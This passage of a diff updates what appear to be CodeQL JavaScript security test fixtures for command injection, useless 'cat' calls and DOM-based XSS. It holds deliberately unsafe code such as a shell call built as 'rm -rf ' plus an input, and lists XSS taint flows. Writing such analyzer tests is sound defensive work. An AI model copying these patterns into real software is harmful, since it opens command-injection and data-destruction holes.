require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected index 1a561b8fc416..820d8af4767d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected @@ -78,7 +78,7 @@ options | uselesscat.js:86:1:86:75 | execFil ... utf8'}) | uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | | uselesscat.js:100:1:100:56 | execFil ... ptions) | uselesscat.js:100:42:100:55 | unknownOptions | | uselesscat.js:111:1:111:51 | spawn(' ... it'] }) | uselesscat.js:111:14:111:50 | { stdio ... rit'] } | -| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | +| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // $ ... utf8'\\n} | | uselesscat.js:147:1:147:47 | shelljs ... utf8'}) | uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | | uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) | uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | | uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) | uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js index 9654b26dec03..6e62a1655420 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js 
@@ -7,21 +7,21 @@ var spawnSync = child_process.spawnSync; var fs = require('fs'); var app = express(); -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat /proc/" + id + "/status", function (err, out) { // NOT OK +exec("cat /proc/" + id + "/status", function (err, out) { // $ Alert console.log(out); }); -execSync('cat /proc/cpuinfo').toString(); // NOT OK. +execSync('cat /proc/cpuinfo').toString(); // $ Alert -execSync(`cat ${newpath}`) // NOT OK +execSync(`cat ${newpath}`) // $ Alert execSync('cat package.json | wc -l'); // OK - pipes! -execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK multiple files. +execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK - multiple files. -execSync(`cat ${newpath} /foo/bar`).toString(); // OK multiple files. +execSync(`cat ${newpath} /foo/bar`).toString(); // OK - multiple files. exec(`cat ${newpath} | grep foo`, function (err, out) { }) // OK - pipes 
@@ -29,73 +29,73 @@ execSync(`cat ${newpath}`, {uid: 1000}) // OK - non trivial options exec('cat *.js | wc -l', { cwd: './' }, function (err, out) { }); // OK - wildcard and pipes -execSync(`cat foo/bar/${newpath}`); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK (fs.readFileSync cannot emulate uid / gid)) +execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK - (fs.readFileSync cannot emulate uid / gid)) -execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); // OK. +execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); -execSync(`cat ${newpath} > ${destpath}`).toString(); // OK. 
+execSync(`cat ${newpath} > ${destpath}`).toString(); -execSync(`cat ${files.join(' ')} > ${outFile}`); // OK +execSync(`cat ${files.join(' ')} > ${outFile}`); -execSync(`cat ${files.join(' ')}`); // OK - but flagged - not just a simple file read [INCONSISTENCY] +execSync(`cat ${files.join(' ')}`); // $ SPURIOUS: Alert - not just a simple file read exec("cat /proc/cpuinfo | grep name"); // OK - pipes execSync(`cat ${newpath} | ${othertool}`); // OK - pipes function cat(file) { - return execSync('cat ' + file).toString(); // NOT OK + return execSync('cat ' + file).toString(); // $ Alert } -execSync("sh -c 'cat " + newpath + "'"); // NOT OK - but not flagged [INCONSISTENCY] +execSync("sh -c 'cat " + newpath + "'"); // $ MISSING: Alert var execFile = child_process.execFile; var execFileSync = child_process.execFileSync; -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK. - stderr is used. +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK - stderr is used. 
console.log(stderr); }); -execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ]); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ]); // $ Alert var opts = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], opts); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], opts); // $ Alert var anOptsFileNameThatIsTooLongToBePrintedByToString = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // $ Alert -execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // $ Alert -execSync('cat /proc/cpuinfo' + foo).toString(); // NOT OK. 
+execSync('cat /proc/cpuinfo' + foo).toString(); // $ Alert -execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // NOT OK +execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // $ Alert execFileSync('node', [ `foo/bar/${newpath}` ]); // OK - not a call to cat -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -exec("cat foo/bar", (err, out) => doSomethingWith(out)); // NOT OK +exec("cat foo/bar", (err, out) => doSomethingWith(out)); // $ Alert execFileSync('/bin/cat', [ 'pom.xml' ], unknownOptions); // OK - unknown options. @@ -118,13 +118,13 @@ spawn('cat', { stdio: ['pipe', stdin, 'inherit'] }); // OK - Non trivial use. (B cat.stdout.on('end', () => res.end()); })(); -var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); // OK +var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); console.log(notDead); (function () { - var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK + var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert someCall( exec("cat foo/bar", (err, out) => {console.log(out)}) // OK - non-trivial use of returned proccess. 
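Review bot: Two converted comments in the `@@ -29,73 +29,73 @@` hunk read worse than the originals. `// OK - (fs.readFileSync cannot emulate uid / gid))` keeps the old parentheses with one extra `)`, and `// $ MISSING: Alert` on the `sh -c 'cat ...'` call gives no reason for the missing alert. Suggested: `// OK - fs.readFileSync cannot emulate uid / gid`, and a short reason after `MISSING: Alert`. The hunk also mixes bare lines and `// OK - reason` lines for non-alerting cases; picking one convention would make the fixture easier to scan.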
@@ -133,34 +133,34 @@ console.log(notDead); return exec("cat foo/bar", (err, out) => {console.log(out)}); // OK - non-trivial use of returned proccess. })(); -const stdout2 = execSync('cat /etc/dnsmasq.conf', { // NOT OK. +const stdout2 = execSync('cat /etc/dnsmasq.conf', { // $ Alert encoding: 'utf8' }); -exec('/bin/cat', function (e, s) {}); // OK +exec('/bin/cat', function (e, s) {}); -spawn("cat") // OK +spawn("cat") var shelljs = require("shelljs"); -shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert let cspawn = require('cross-spawn'); -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar']); // NOT OK -cspawn('cat', (err, out) => {console.log(out)}); // OK -cspawn('cat', { encoding: 'utf8' }); // OK +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar']); // $ Alert +cspawn('cat', (err, out) => {console.log(out)}); +cspawn('cat', { encoding: 'utf8' }); -let myResult = cspawn.sync('cat', ['foo/bar']); // NOT OK -let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK +let myResult = cspawn.sync('cat', ['foo/bar']); // $ Alert +let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert var execmod = require('exec'); 
-execmod("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +execmod("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql deleted file mode 100644 index 87b27a68998c..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.DomBasedXssQuery - -deprecated class ConsistencyConfig extends ConsistencyConfiguration { - ConsistencyConfig() { this = "ConsistencyConfig" } - - override DataFlow::Node getAnAlert() { DomBasedXssFlow::flow(_, result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected index eb46033824f4..de03bca13d4b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected 
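Review bot: On the new side of the @@ -133,34 hunk, `let myResult` is declared twice in what appears to be the same scope (the two `cspawn.sync` lines), which a JavaScript engine rejects as a redeclaration. The fixture presumably only works because the extractor is lenient here, so both `$ Alert` expectations would depend on parser error recovery rather than on valid input. The duplicate predates this commit, but both lines are rewritten here, so it is a cheap moment to rename the second one: `let myResult2 = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert`.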
@@ -1,657 +1,241 @@ -nodes -| addEventListener.js:1:43:1:47 | event | semmle.label | event | -| addEventListener.js:2:20:2:24 | event | semmle.label | event | -| addEventListener.js:2:20:2:29 | event.data | semmle.label | event.data | -| addEventListener.js:5:43:5:48 | data | semmle.label | data | -| addEventListener.js:5:43:5:48 | {data} | semmle.label | {data} | -| addEventListener.js:6:20:6:23 | data | semmle.label | data | -| addEventListener.js:10:21:10:25 | event | semmle.label | event | -| addEventListener.js:12:24:12:28 | event | semmle.label | event | -| addEventListener.js:12:24:12:33 | event.data | semmle.label | event.data | -| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | semmle.label | \\u0275getDOM ... ().href | -| angular2-client.ts:26:44:26:69 | this.ro ... .params | semmle.label | this.ro ... .params | -| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | -| angular2-client.ts:27:44:27:74 | this.ro ... yParams | semmle.label | this.ro ... yParams | -| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | -| angular2-client.ts:28:44:28:71 | this.ro ... ragment | semmle.label | this.ro ... ragment | -| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | -| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | -| angular2-client.ts:32:46:32:59 | map.get('foo') | semmle.label | map.get('foo') | -| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | semmle.label | this.ro ... 1].path | -| angular2-client.ts:36:44:36:80 | this.ro ... ameters | semmle.label | this.ro ... ameters | -| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | semmle.label | this.ro ... eters.x | -| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | semmle.label | this.ro ... et('x') | -| angular2-client.ts:38:44:38:89 | this.ro ... .params | semmle.label | this.ro ... 
.params | -| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | semmle.label | this.ro ... arams.x | -| angular2-client.ts:40:44:40:58 | this.router.url | semmle.label | this.router.url | -| angular2-client.ts:42:45:42:59 | this.router.url | semmle.label | this.router.url | -| angular2-client.ts:43:75:43:105 | this.ro ... yParams | semmle.label | this.ro ... yParams | -| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | -| angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | semmle.label | routeSn ... ('foo') | -| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | semmle.label | Cookie.get("unsafe") | -| angular-tempate-url.js:13:30:13:31 | ev | semmle.label | ev | -| angular-tempate-url.js:14:26:14:27 | ev | semmle.label | ev | -| angular-tempate-url.js:14:26:14:32 | ev.data | semmle.label | ev.data | -| classnames.js:7:31:7:84 | `` | semmle.label | `` | -| classnames.js:7:47:7:69 | classNa ... w.name) | semmle.label | classNa ... w.name) | -| classnames.js:7:58:7:68 | window.name | semmle.label | window.name | -| classnames.js:8:31:8:85 | `` | semmle.label | `` | -| classnames.js:8:47:8:70 | classNa ... w.name) | semmle.label | classNa ... w.name) | -| classnames.js:8:59:8:69 | window.name | semmle.label | window.name | -| classnames.js:9:31:9:85 | `` | semmle.label | `` | -| classnames.js:9:47:9:70 | classNa ... w.name) | semmle.label | classNa ... w.name) | -| classnames.js:9:59:9:69 | window.name | semmle.label | window.name | -| classnames.js:10:45:10:55 | window.name | semmle.label | window.name | -| classnames.js:11:31:11:79 | `` | semmle.label | `` | -| classnames.js:11:47:11:64 | unsafeStyle('foo') | semmle.label | unsafeStyle('foo') | -| classnames.js:13:31:13:83 | `` | semmle.label | `` | -| classnames.js:13:47:13:68 | safeSty ... w.name) | semmle.label | safeSty ... 
w.name) | -| classnames.js:13:57:13:67 | window.name | semmle.label | window.name | -| classnames.js:15:31:15:78 | `` | semmle.label | `` | -| classnames.js:15:47:15:63 | clsx(window.name) | semmle.label | clsx(window.name) | -| classnames.js:15:52:15:62 | window.name | semmle.label | window.name | -| classnames.js:17:32:17:79 | `` | semmle.label | `` | -| classnames.js:17:48:17:64 | clsx(window.name) | semmle.label | clsx(window.name) | -| classnames.js:17:53:17:63 | window.name | semmle.label | window.name | -| clipboard.ts:8:11:8:51 | html | semmle.label | html | -| clipboard.ts:8:18:8:51 | clipboa ... /html') | semmle.label | clipboa ... /html') | -| clipboard.ts:15:25:15:28 | html | semmle.label | html | -| clipboard.ts:24:23:24:58 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | -| clipboard.ts:29:19:29:54 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | -| clipboard.ts:33:19:33:68 | e.origi ... /html') | semmle.label | e.origi ... /html') | -| clipboard.ts:43:15:43:55 | html | semmle.label | html | -| clipboard.ts:43:22:43:55 | clipboa ... /html') | semmle.label | clipboa ... /html') | -| clipboard.ts:50:29:50:32 | html | semmle.label | html | -| clipboard.ts:71:13:71:62 | droppedHtml | semmle.label | droppedHtml | -| clipboard.ts:71:27:71:62 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | -| clipboard.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | -| clipboard.ts:98:15:98:54 | html | semmle.label | html | -| clipboard.ts:98:22:98:54 | dataTra ... /html') | semmle.label | dataTra ... 
/html') | -| clipboard.ts:99:23:99:26 | html | semmle.label | html | -| custom-element.js:5:26:5:36 | window.name | semmle.label | window.name | -| d3.js:4:12:4:22 | window.name | semmle.label | window.name | -| d3.js:11:15:11:24 | getTaint() | semmle.label | getTaint() | -| d3.js:12:20:12:29 | getTaint() | semmle.label | getTaint() | -| d3.js:14:20:14:29 | getTaint() | semmle.label | getTaint() | -| d3.js:21:15:21:24 | getTaint() | semmle.label | getTaint() | -| dates.js:9:9:9:69 | taint | semmle.label | taint | -| dates.js:9:17:9:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:9:36:9:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:9:36:9:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:11:31:11:70 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:11:42:11:68 | dateFns ... taint) | semmle.label | dateFns ... taint) | -| dates.js:11:63:11:67 | taint | semmle.label | taint | -| dates.js:12:31:12:73 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:12:42:12:71 | dateFns ... taint) | semmle.label | dateFns ... taint) | -| dates.js:12:66:12:70 | taint | semmle.label | taint | -| dates.js:13:31:13:72 | `Time i ... time)}` | semmle.label | `Time i ... time)}` | -| dates.js:13:42:13:70 | dateFns ... )(time) | semmle.label | dateFns ... )(time) | -| dates.js:13:59:13:63 | taint | semmle.label | taint | -| dates.js:16:31:16:69 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:16:42:16:67 | moment( ... (taint) | semmle.label | moment( ... (taint) | -| dates.js:16:62:16:66 | taint | semmle.label | taint | -| dates.js:18:31:18:66 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:18:42:18:64 | datefor ... taint) | semmle.label | datefor ... taint) | -| dates.js:18:59:18:63 | taint | semmle.label | taint | -| dates.js:21:31:21:68 | `Time i ... aint)}` | semmle.label | `Time i ... 
aint)}` | -| dates.js:21:42:21:66 | dayjs(t ... (taint) | semmle.label | dayjs(t ... (taint) | -| dates.js:21:61:21:65 | taint | semmle.label | taint | -| dates.js:30:9:30:69 | taint | semmle.label | taint | -| dates.js:30:17:30:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:30:36:30:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:30:36:30:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:37:31:37:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:37:42:37:82 | dateFns ... taint) | semmle.label | dateFns ... taint) | -| dates.js:37:77:37:81 | taint | semmle.label | taint | -| dates.js:38:31:38:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:38:42:38:82 | luxon.f ... taint) | semmle.label | luxon.f ... taint) | -| dates.js:38:77:38:81 | taint | semmle.label | taint | -| dates.js:39:31:39:86 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:39:42:39:84 | moment. ... taint) | semmle.label | moment. ... taint) | -| dates.js:39:79:39:83 | taint | semmle.label | taint | -| dates.js:40:31:40:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:40:42:40:82 | dayjs.f ... taint) | semmle.label | dayjs.f ... taint) | -| dates.js:40:77:40:81 | taint | semmle.label | taint | -| dates.js:46:9:46:69 | taint | semmle.label | taint | -| dates.js:46:17:46:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:46:36:46:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:46:36:46:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:48:31:48:90 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:48:42:48:88 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | -| dates.js:48:83:48:87 | taint | semmle.label | taint | -| dates.js:49:31:49:89 | `Time i ... aint)}` | semmle.label | `Time i ... 
aint)}` | -| dates.js:49:42:49:87 | new Dat ... (taint) | semmle.label | new Dat ... (taint) | -| dates.js:49:82:49:86 | taint | semmle.label | taint | -| dates.js:50:31:50:104 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:50:42:50:102 | DateTim ... (taint) | semmle.label | DateTim ... (taint) | -| dates.js:50:97:50:101 | taint | semmle.label | taint | -| dates.js:54:9:54:69 | taint | semmle.label | taint | -| dates.js:54:17:54:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | -| dates.js:54:36:54:55 | window.location.hash | semmle.label | window.location.hash | -| dates.js:54:36:54:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | -| dates.js:57:31:57:101 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:57:42:57:99 | moment. ... (taint) | semmle.label | moment. ... (taint) | -| dates.js:57:94:57:98 | taint | semmle.label | taint | -| dates.js:59:31:59:87 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:59:42:59:85 | luxon.e ... (taint) | semmle.label | luxon.e ... (taint) | -| dates.js:59:80:59:84 | taint | semmle.label | taint | -| dates.js:61:31:61:88 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | -| dates.js:61:42:61:86 | dayjs.s ... (taint) | semmle.label | dayjs.s ... (taint) | -| dates.js:61:81:61:85 | taint | semmle.label | taint | -| dragAndDrop.ts:8:11:8:50 | html | semmle.label | html | -| dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | semmle.label | dataTra ... /html') | -| dragAndDrop.ts:15:25:15:28 | html | semmle.label | html | -| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | -| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | -| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | semmle.label | e.origi ... /html') | -| dragAndDrop.ts:43:15:43:54 | html | semmle.label | html | -| dragAndDrop.ts:43:22:43:54 | dataTra ... 
/html') | semmle.label | dataTra ... /html') | -| dragAndDrop.ts:50:29:50:32 | html | semmle.label | html | -| dragAndDrop.ts:71:13:71:61 | droppedHtml | semmle.label | droppedHtml | -| dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | semmle.label | e.dataT ... /html') | -| dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | -| event-handler-receiver.js:2:31:2:83 | '

    ' | semmle.label | '

    ' | -| event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | -| jquery.js:2:7:2:40 | tainted | semmle.label | tainted | -| jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | -| jquery.js:4:5:4:11 | tainted | semmle.label | tainted | -| jquery.js:5:13:5:19 | tainted | semmle.label | tainted | -| jquery.js:6:11:6:17 | tainted | semmle.label | tainted | -| jquery.js:7:5:7:34 | "
    " | semmle.label | "
    " | -| jquery.js:7:20:7:26 | tainted | semmle.label | tainted | -| jquery.js:8:18:8:34 | "XSS: " + tainted | semmle.label | "XSS: " + tainted | -| jquery.js:8:28:8:34 | tainted | semmle.label | tainted | -| jquery.js:10:5:10:40 | "" + ... "" | semmle.label | "" + ... "" | -| jquery.js:10:13:10:20 | location | semmle.label | location | -| jquery.js:10:13:10:31 | location.toString() | semmle.label | location.toString() | -| jquery.js:14:19:14:58 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| jquery.js:14:38:14:57 | window.location.hash | semmle.label | window.location.hash | -| jquery.js:15:19:15:60 | decodeU ... search) | semmle.label | decodeU ... search) | -| jquery.js:15:38:15:59 | window. ... .search | semmle.label | window. ... .search | -| jquery.js:16:19:16:64 | decodeU ... ring()) | semmle.label | decodeU ... ring()) | -| jquery.js:16:38:16:52 | window.location | semmle.label | window.location | -| jquery.js:16:38:16:63 | window. ... tring() | semmle.label | window. ... tring() | -| jquery.js:18:7:18:33 | hash | semmle.label | hash | -| jquery.js:18:14:18:33 | window.location.hash | semmle.label | window.location.hash | -| jquery.js:21:5:21:8 | hash | semmle.label | hash | -| jquery.js:21:5:21:21 | hash.substring(1) | semmle.label | hash.substring(1) | -| jquery.js:22:5:22:8 | hash | semmle.label | hash | -| jquery.js:22:5:22:25 | hash.su ... (1, 10) | semmle.label | hash.su ... (1, 10) | -| jquery.js:23:5:23:8 | hash | semmle.label | hash | -| jquery.js:23:5:23:18 | hash.substr(1) | semmle.label | hash.substr(1) | -| jquery.js:24:5:24:8 | hash | semmle.label | hash | -| jquery.js:24:5:24:17 | hash.slice(1) | semmle.label | hash.slice(1) | -| jquery.js:27:5:27:8 | hash | semmle.label | hash | -| jquery.js:27:5:27:25 | hash.re ... #', '') | semmle.label | hash.re ... #', '') | -| jquery.js:28:5:28:26 | window. ... .search | semmle.label | window. ... .search | -| jquery.js:28:5:28:43 | window. ... ?', '') | semmle.label | window. ... 
?', '') | -| jquery.js:34:5:34:25 | '' + ... '' | semmle.label | '' + ... '' | -| jquery.js:34:13:34:16 | hash | semmle.label | hash | -| jquery.js:36:25:36:31 | tainted | semmle.label | tainted | -| jquery.js:37:25:37:37 | () => tainted | semmle.label | () => tainted | -| jquery.js:37:31:37:37 | tainted | semmle.label | tainted | -| json-stringify.jsx:5:9:5:36 | locale | semmle.label | locale | -| json-stringify.jsx:5:18:5:36 | req.param("locale") | semmle.label | req.param("locale") | -| json-stringify.jsx:11:51:11:56 | locale | semmle.label | locale | -| json-stringify.jsx:19:56:19:61 | locale | semmle.label | locale | -| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | semmle.label | JSON.st ... locale) | -| json-stringify.jsx:31:55:31:60 | locale | semmle.label | locale | -| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | semmle.label | JSON.st ... jsonLD) | -| jwt-server.js:7:9:7:35 | taint | semmle.label | taint | -| jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| jwt-server.js:9:16:9:20 | taint | semmle.label | taint | -| jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | -| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | semmle.label | `Hi, yo ... sage}.` | -| nodemailer.js:13:50:13:66 | req.query.message | semmle.label | req.query.message | -| optionalSanitizer.js:2:7:2:39 | target | semmle.label | target | -| optionalSanitizer.js:2:16:2:39 | documen ... .search | semmle.label | documen ... 
